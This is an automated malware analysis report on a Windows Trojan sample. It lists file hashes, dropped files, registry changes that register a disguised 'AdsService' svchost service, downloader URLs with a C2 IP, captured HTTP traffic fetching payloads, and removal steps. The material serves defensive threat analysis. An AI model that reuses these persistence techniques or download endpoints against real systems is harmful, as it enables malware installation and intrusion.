Trojan.Win32.FlyStudio_6c877d78dc

by malwarelabrobot on August 1st, 2017 in Malware Descriptions.

Gen:Variant.Razy.191688 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.6183 (DrWeb), Gen:Variant.Razy.191688 (B) (Emsisoft), Trojan-FNDE!6C877D78DC65 (McAfee), Trojan.Gen (Symantec), Trojan.Win32.Agent (Ikarus), Gen:Variant.Razy.191688 (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0PGE17 (TrendMicro), Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 6c877d78dc6550ff99e7d85f869890f8
SHA1: e4dfd8b1611935f3550bf82c84ae0c39dc29ebea
SHA256: 157db1a18ea0a09f12c46c0c9672775a133f36ae1d29423844b4bf9ca1d84617
SSDeep: 6144:MHPJ417Frt OOLt2n75z0PGaogLfSaAONTKJmwObfo:2PmDqL8n75zYGWr9nTjfo
Size: 340496 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-06 07:29:59
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2792

The Trojan injects its code into the following process(es):

tip.exe:2620

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (52215 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (147569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (37968 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (182553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (0 bytes)

Registry activity

The process %original file name%.exe:2792 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\services\AdsService\Parameters]
"ServiceDll" = "C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\6c877d78dc6550ff99e7d85f869890f8_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"AdsServiceGroup" = "AdsService"

[HKLM\System\CurrentControlSet\services\AdsService]
"Description" = "AdsService"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tip.exe:2620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@A7B3.tmp,"

Dropped PE files

MD5 File path
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin
4eb07a52c76a86373b33cc69ae50f839 c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin
5d67ff375aaa635e3bc545d5ccefb9be c:\Users\"%CurrentUserName%"\AppData\Local\Temp\_@A7B3.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 241331 241664 4.55836 28d93a4866fee5e9c04a67655040d2ed
.rdata 245760 77038 77312 3.73342 3ed56b57cc626764796f03bdab466f39
.data 323584 9556 6144 2.76591 f2a1c0bf0a7b50b83d143a7502cd2aa5
.tls 335872 9 512 0.014135 1f354d76203061bfdd5a53dae48d5435
.rsrc 339968 488 512 3.30333 84e66ff2e405d01acdebe7444e41161c
.reloc 344064 12820 13312 4.49439 21abc5d2a6af9a076e50bf1671f700e0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 49

URLs

URL IP
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/report
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/dll_service.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/tip.bin 108.61.212.148
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/list 108.61.212.148
hxxp://api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com/api/ip
hxxp://down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/send 108.61.212.148
hxxp://api.knsdknknndnfjenkjwwlekfj.com/api/list 108.61.212.148


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /api/send HTTP/1.1
Server: [elided]
Server-Key: rANO2nylEX0ki37Zd8xGFDTb51wHRPSJhBaotKmLCusgYUfjzMecQIq4vpW6V9
User-Agent: winnet http client v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:38 GMT
Content-Length: 11
Bad Request..


GET /api/report HTTP/1.1
Server: D5JMzSN39ScSleF8PTJMY2BPW3iSceK31HigZ5hTV8kyD8X2k8KgNPRMW3YHcSheNPs2Vy4yK3iSXPD2LeR8JMc8iPXTDSqSLeF8HgB2lyCyieV5iTigJMHgCyMg85Nyy5XMB8R8lMX2BPBP1HX2qHlMRy4M3SRPvSR8jPYHNMVMR8NyN8c2vSk8RHqPXyv3JML2iP13igReiPzMW2A395aTiTjT15RSJPqyJPPfGMByCyyd
Server-Key: HPyM82wv35eSgTbtonEdIfrQ7A60mxOuCJZiKhFWcL9pjalUVNRXBqkY1z4GDs
User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 242
Content-Type: text/plain; charset=Windows-1252
Expires: -1
Server: Microsoft-IIS/8.5
Server-Key: bN94gzXtuSH8C7wvLEqcJBY1MxGPWpRrndFaQ25emO3sThk6IUolDjVfyKZi0A
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:24 GMT



GET /api/ip HTTP/1.1

User-Agent: winnet http client v1.0
Host: api.jeugjv88834njvnxmvhdhjskhgi34hsdghksd.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:35 GMT
Content-Length: 71
{"ip":"194.242.96.218","iso_code":"UA","en":"Ukraine","cn":"........."
}..


GET /dll_service.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 25 Jul 2017 06:54:09 GMT
Accept-Ranges: bytes
ETag: "461abfd0125d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:23 GMT
Content-Length: 974336

<<< skipped >>>

GET /tip.bin HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)
Host: down.2354jxkfhdnvjdkhg4hk3khdkhfkdhkgwsdg.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Thu, 22 Jun 2017 04:23:09 GMT
Accept-Ranges: bytes
ETag: "5b9e540febd21:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:29 GMT
Content-Length: 304640

<<< skipped >>>

GET /api/list HTTP/1.1
User-Agent: restclient for cpp v1.0
Host: api.knsdknknndnfjenkjwwlekfj.com
Connection: Keep-Alive


HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 31 Jul 2017 12:54:34 GMT
Content-Length: 11
Bad Request..


The Trojan connects to the servers at the following location(s):

svchost.exe_2972:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385

tip.exe_2620:

`.rsrc
t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
shell32.dll
advapi32.dll
ShellExecuteA
RegOpenKeyA
RegCloseKey
\chrome.exe-start-maximized hXXps://VVV.facebook.com
hXXps://VVV.facebook.com
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
, #&')*)
-0-(0%()(
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
.PAVCException@@
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
.text
`.rdata
@.data
.rsrc
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2792

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\tip[1].bin (52215 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\AdService.dll (147569 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AdService\tip.exe (37968 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\dll_service[1].bin (182553 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ip[1] (71 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\report[1].txt (242 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
